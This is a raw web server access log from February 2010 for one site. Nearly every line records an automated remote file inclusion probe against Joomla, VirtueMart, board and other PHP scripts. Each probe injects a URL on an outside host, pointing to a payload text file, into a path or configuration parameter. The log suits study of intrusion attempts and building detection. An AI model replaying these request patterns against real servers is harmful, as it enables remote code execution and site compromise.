216.17.109.216 - - [08/Feb/2010:10:09:19 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4955 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:10:09:20 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:10:09:33 -0800] "GET /logs/access_100114.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:10:09:33 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4955 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:10:09:34 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:10:10 -0800] "GET /logs/access_100106.log%20%20//admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:15:09 -0800] "GET /logs//admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:15:09 -0800] "GET /logs/access_100106.log//admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:15:09 -0800] "GET /admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:20:46 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:20:47 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:20:47 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:21:18 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:21:18 -0800] "GET /logs/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:21:19 -0800] "GET /index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:21:38 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:21:50 -0800] "GET /logs/php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:21:50 -0800] "GET /php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:21:50 -0800] "GET /logs/access.log%20%20/php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:21:52 -0800] "GET /logs/access_100111.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:21:52 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:22:02 -0800] "GET /logs/access_100110.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:23:10 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:23:10 -0800] "GET /logs/?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:23:10 -0800] "GET /?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:23:27 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:23:27 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:23:27 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:10:23:36 -0800] "GET /logs//?_zb_page=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:10:23:36 -0800] "GET /logs/access_100103.log//?_zb_page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:10:23:37 -0800] "GET /?_zb_page=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:23:43 -0800] "GET /logs/access_100119.log%20%20/php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:24:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:24:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:24:18 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:24:27 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:24:27 -0800] "GET /logs/access_100110.log%20%20/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:24:27 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:24:28 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:24:39 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:24:39 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:24:39 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:24:50 -0800] "GET /logs/access_100119.log%20%20/?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [08/Feb/2010:10:25:04 -0800] "GET /logs/access_100201.log//?_zb_page=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [08/Feb/2010:10:25:21 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [08/Feb/2010:10:25:21 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [08/Feb/2010:10:25:21 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:25:32 -0800] "GET /logs/access_100126.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:25:36 -0800] "GET /logs/access_100126.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:10:26:02 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:06 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:06 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:54 -0800] "GET /logs/access_100114.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:55 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:27:55 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:28:07 -0800] "GET //lostpasswd.php?env[include_prefix]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:28:07 -0800] "GET /logs/access_100116.log%20%20///lostpasswd.php?env[include_prefix]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:28:07 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:28:09 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:28:52 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [08/Feb/2010:10:28:57 -0800] "GET /logs/access_100116.log HTTP/1.0" 200 1677184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:28:57 -0800] "GET /logs/access_100113.log%20%20///lostpasswd.php?env[include_prefix]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:29:08 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:29:53 -0800] "GET /logs/access_100106.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:29:53 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:29:53 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:10:29:54 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:11 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:11 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:11 -0800] "GET /write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:13 -0800] "GET /write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:13 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:13 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:24 -0800] "GET /logs/access_100131.log//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:26 -0800] "GET /logs/access_100131.log//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:26 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:26 -0800] "GET /write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:26 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:27 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:27 -0800] "GET /write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:28 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:36 -0800] "GET /logs/access_100131.log%20%20//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:10:30:40 -0800] "GET /logs/access_100131.log%20%20//write_comment_update.php?board_skin_path=http://ebpo.com.ua/euro2008/plugins/spamx/templates/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:30:52 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:30:52 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:30:52 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:30:57 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:31:14 -0800] "GET /logs/access_100203.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:31:38 -0800] "GET /logs/access_100123.log/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:31:38 -0800] "GET /logs/access_100119.log/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:31:50 -0800] "GET /logs/access_100129.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:31:50 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:31:50 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:33:28 -0800] "GET /logs/access_100107.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:33:28 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:33:28 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:33:49 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:33:49 -0800] "GET /logs/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:33:50 -0800] "GET /index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:34:01 -0800] "GET /logs/access_100107.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:34:01 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:10:34:01 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [08/Feb/2010:10:34:09 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:34:41 -0800] "GET /logs/access_100113.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:35:34 -0800] "GET /logs/access_100111.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [08/Feb/2010:10:35:41 -0800] "GET /logs/access_100116.log///lostpasswd.php?env[include_prefix]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:36:33 -0800] "GET /logs/access_100114.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:37:55 -0800] "GET /include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:37:55 -0800] "GET /logs//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:37:55 -0800] "GET /logs/access_100110.log%20%20//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:38:47 -0800] "GET /include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:38:47 -0800] "GET /logs/access_100110.log%20%20//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:38:47 -0800] "GET /logs//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:10:40:03 -0800] "GET /logs/access_100107.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:10:40:03 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:10:40:03 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [08/Feb/2010:10:40:49 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:40:56 -0800] "GET /logs/access_100104.log%20%20//include/write.php?dir=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
